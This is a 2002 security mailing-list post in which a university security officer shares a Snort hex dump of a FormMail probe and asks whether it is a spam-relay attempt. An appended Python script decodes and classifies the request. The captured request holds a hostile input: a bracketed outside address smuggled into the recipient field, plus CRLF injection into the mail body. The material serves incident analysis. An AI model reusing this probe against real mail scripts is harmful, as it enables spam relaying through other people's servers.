new type of formmail probes

From: Russell Fulton (r.fulton@auckland.ac.nz)
Date: 09/05/02


From: Russell Fulton <r.fulton@auckland.ac.nz>
To: incidents@securityfocus.com
Date: 05 Sep 2002 14:23:55 +1200

Hi All,
        Over the last week or so Snort has been picking up many probes like
this:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] WEB-CGI formmail arbitrary command execution attempt [**]
09/05-01:24:57.641599 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x30F
62.49.117.114:2645 -> 130.216.35.105:80 TCP TTL:107 TOS:0x0 ID:20226 IpLen:20 DgmLen:769 DF
***AP*** Seq: 0x350A6D63 Ack: 0x5BFB5778 Win: 0x2238 TcpLen: 20
50 4F 53 54 20 2F 63 67 69 2D 62 69 6E 2F 66 6F POST /cgi-bin/fo
72 6D 6D 61 69 6C 2E 70 6C 20 48 54 54 50 2F 31 rmmail.pl HTTP/1
2E 30 0D 0A 56 69 61 3A 20 31 2E 30 20 53 45 52 .0..Via: 1.0 SER
56 45 52 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A VER..Connection:
20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 6F 6E Keep-Alive..Con
74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 30 32 tent-Length: 402
0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F ..User-Agent: Mo
7A 69 6C 6C 61 2F 34 2E 30 36 20 28 57 69 6E 39 zilla/4.06 (Win9
35 3B 20 49 29 0D 0A 43 6F 6E 74 65 6E 74 2D 54 5; I)..Content-T
79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E ype: application
2F 78 2D 77 77 77 2D 66 6F 72 6D 2D 75 72 6C 65 /x-www-form-urle
6E 63 6F 64 65 64 0D 0A 48 6F 73 74 3A 20 77 77 ncoded..Host: ww
77 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 w.cs.auckland.ac
2E 6E 7A 0D 0A 41 63 63 65 70 74 3A 20 69 6D 61 .nz..Accept: ima
67 65 2F 67 69 66 2C 20 69 6D 61 67 65 2F 78 2D ge/gif, image/x-
78 62 69 74 6D 61 70 2C 20 69 6D 61 67 65 2F 6A xbitmap, image/j
70 65 67 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E peg, application
2F 6D 73 77 6F 72 64 2C 20 2A 2F 2A 0D 0A 52 65 /msword, */*..Re
66 65 72 65 72 3A 20 68 74 74 70 3A 2F 2F 77 77 ferer: http://ww
77 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 w.cs.auckland.ac
2E 6E 7A 0D 0A 0D 0A 65 6D 61 69 6C 3D 64 61 61 .nz....email=daa
31 38 40 66 64 6A 31 30 2E 63 6F 6D 26 72 65 63 18@fdj10.com&rec
69 70 69 65 6E 74 3D 3C 69 69 6B 65 73 74 79 78 ipient=<iikestyx
40 61 6F 6C 2E 63 6F 6D 3E 77 77 77 2E 63 73 2E @aol.com>www.cs.
61 75 63 6B 6C 61 6E 64 2E 61 63 2E 6E 7A 26 73 auckland.ac.nz&s
75 62 6A 65 63 74 3D 77 77 77 2E 63 73 2E 61 75 ubject=www.cs.au
63 6B 6C 61 6E 64 2E 61 63 2E 6E 7A 25 32 46 63 ckland.ac.nz%2Fc
67 69 2D 62 69 6E 25 32 46 66 6F 72 6D 6D 61 69 gi-bin%2Fformmai
6C 2E 70 6C 25 32 30 25 32 30 25 32 30 25 32 30 l.pl%20%20%20%20
25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 %20%20%20%20%20%
32 30 25 32 30 25 32 30 25 32 30 25 32 30 6F 78 20%20%20%20%20ox
79 35 32 26 3D 25 30 44 25 30 41 25 30 44 25 30 y52&=%0D%0A%0D%0
41 74 69 6D 65 25 32 46 64 61 74 65 25 33 41 25 Atime%2Fdate%3A%
32 30 30 38 25 33 41 32 30 25 33 41 31 39 70 6D 2008%3A20%3A19pm
25 32 30 25 32 46 25 32 30 30 39 25 32 46 30 34 %20%2F%2009%2F04
25 32 46 32 30 30 32 25 30 44 25 30 41 3C 41 25 %2F2002%0D%0A<A%
32 30 48 52 45 46 25 33 44 25 32 32 77 77 77 2E 20HREF%3D%22www.
63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 2E 6E cs.auckland.ac.n
7A 25 32 46 63 67 69 2D 62 69 6E 25 32 46 66 6F z%2Fcgi-bin%2Ffo
72 6D 6D 61 69 6C 2E 70 6C 25 32 32 3E 77 77 77 rmmail.pl%22>www
2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 2E .cs.auckland.ac.
6E 7A 25 32 46 63 67 69 2D 62 69 6E 25 32 46 66 nz%2Fcgi-bin%2Ff
6F 72 6D 6D 61 69 6C 2E 70 6C 3C 25 32 46 41 3E ormmail.pl<%2FA>
25 30 44 25 30 41 25 30 44 25 30 41 25 30 44 25 %0D%0A%0D%0A%0D%
30 41 25 30 44 25 30 41 25 30 44 25 30 41 25 30 0A%0D%0A%0D%0A%0
44 25 30 41 6F 78 79 35 32 D%0Aoxy52

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Am I right in assuming that this is just more spammers looking for places
to launder mail, or is it more sinister than that? I.e., do we believe
the 'arbitrary command execution attempt' bit?

Cheers, Russell.

-- 
Russell Fulton, Computer and Network Security Officer
The University of Auckland,  New Zealand

"It ain't necessarily so" - Gershwin

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
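Added example (editor's code, not part of Russell's message and not FormMail's own source): the Python below decodes the Snort payload shown above and pulls out the features that separate a mail-relay probe from a command-injection attempt. The full 729-byte request is transcribed from the dump inline; the Content-Length cross-check (402 body bytes, and 769 DgmLen less 40 bytes of IP and TCP header = 729) confirms the transcription. The check it looks for on `recipient`, an ends-with-allowed-domain match that `<addr>host` slips past while sendmail delivers to the bracketed address, is an assumption about the target's FormMail version, which the message does not state. The alert name should not be read as evidence of shell access on its own; what the signature is most plausibly keying on is the encoded newlines, and the script reports whether any field contains characters a shell would interpret.

```python
"""Decode the Snort payload above and classify the FormMail request it carries."""
import re
from urllib.parse import parse_qs

# Constructed from the alert above: first and last payload lines, used to show
# the dump decoder working (the full request is transcribed in REQUEST below).
DUMP_EXCERPT = """\
50 4F 53 54 20 2F 63 67 69 2D 62 69 6E 2F 66 6F POST /cgi-bin/fo
44 25 30 41 6F 78 79 35 32 D%0Aoxy52"""

HEX_PAIR = re.compile(r"^[0-9A-Fa-f]{2}$")
BRACKETED = re.compile(r"<([^<>@\s]+@[^<>\s]+)>")  # RFC 822 "<addr>" inside a field
SHELL_META = re.compile(r"[;|`$()]")              # only matters if a field reaches a shell


def decode_snort_hex(dump: str) -> bytes:
    """Rebuild payload bytes from Snort's "16 hex bytes, then ASCII" dump lines.

    Only the leading hex tokens (at most 16 per line) are used; the ASCII column
    is ignored, so a short final line decodes cleanly.  Assumes the ASCII column
    never begins with something that itself looks like a hex pair.
    """
    out = bytearray()
    for line in dump.splitlines():
        for tok in line.split()[:16]:
            if not HEX_PAIR.match(tok):
                break
            out.append(int(tok, 16))
    return bytes(out)


# The request transcribed byte for byte from the dump above (14 %20 of padding
# in the subject, six CRLFs before the trailing "oxy52").
HEADERS = (
    b"POST /cgi-bin/formmail.pl HTTP/1.0\r\n"
    b"Via: 1.0 SERVER\r\nConnection: Keep-Alive\r\nContent-Length: 402\r\n"
    b"User-Agent: Mozilla/4.06 (Win95; I)\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Host: www.cs.auckland.ac.nz\r\n"
    b"Accept: image/gif, image/x-xbitmap, image/jpeg, application/msword, */*\r\n"
    b"Referer: http://www.cs.auckland.ac.nz\r\n\r\n"
)
BODY = (
    b"email=daa18@fdj10.com&recipient=<iikestyx@aol.com>www.cs.auckland.ac.nz" +
    b"&subject=www.cs.auckland.ac.nz%2Fcgi-bin%2Fformmail.pl" + b"%20" * 14 + b"oxy52" +
    b"&=%0D%0A%0D%0Atime%2Fdate%3A%2008%3A20%3A19pm%20%2F%2009%2F04%2F2002%0D%0A" +
    b"<A%20HREF%3D%22www.cs.auckland.ac.nz%2Fcgi-bin%2Fformmail.pl%22>" +
    b"www.cs.auckland.ac.nz%2Fcgi-bin%2Fformmail.pl<%2FA>" + b"%0D%0A" * 6 + b"oxy52"
)
REQUEST = HEADERS + BODY


def parse_request(raw: bytes):
    """Split an HTTP/1.0 request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_form(body: bytes) -> dict:
    """Decode the urlencoded body; keep_blank_values keeps the nameless '=...' field."""
    pairs = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return {name: values[0] for name, values in pairs.items()}


def classify(raw: bytes) -> dict:
    """Pull out the features that separate a relay probe from an injection attempt."""
    _method, path, headers, body = parse_request(raw)
    form = parse_form(body)
    host = headers.get("host", "")
    recipient = form.get("recipient", "")
    m = BRACKETED.search(recipient)
    return {
        "path": path,
        "length_ok": len(body) == int(headers.get("content-length", "-1")),
        "real_recipient": m.group(1) if m else None,   # where sendmail actually delivers
        # text after '>' equals Host, so an ends-with-allowed-domain check on
        # recipient passes (assumption about the target's FormMail version)
        "recipient_trailer_is_host": (recipient[m.end():] if m else recipient) == host,
        "referer_matches_host": headers.get("referer", "").endswith(host),
        # subject carries the script's own URL, so the mail reports which host relayed it
        "subject_echoes_script": form.get("subject", "").startswith(host + path),
        # nameless field opens with CRLF CRLF: a blank line plus an HTML link into the mail body
        "nameless_field_injects_blank_line": form.get("", "").startswith("\r\n"),
        "shell_metachars": sorted({c for v in form.values() for c in SHELL_META.findall(v)}),
    }


def verdict(findings: dict) -> str:
    if findings["shell_metachars"]:
        return "inspect for command injection: " + " ".join(findings["shell_metachars"])
    if (findings["real_recipient"] and findings["recipient_trailer_is_host"]
            and findings["subject_echoes_script"]):
        return "mail-relay probe: delivery to %s, subject names this script" % findings["real_recipient"]
    return "unclassified formmail request"


if __name__ == "__main__":
    assert REQUEST.startswith(decode_snort_hex(DUMP_EXCERPT)[:16])
    for key, value in classify(REQUEST).items():
        print("%-36s %r" % (key, value))
    print(verdict(classify(REQUEST)))
```

Run as a script it prints each finding and the verdict. For this capture the only address that actually receives mail is the bracketed one, the subject and the nameless field both carry the script's URL back to that address, and no form value contains a character that a shell would act on, so the request reads as a relay probe rather than an attempt to run commands.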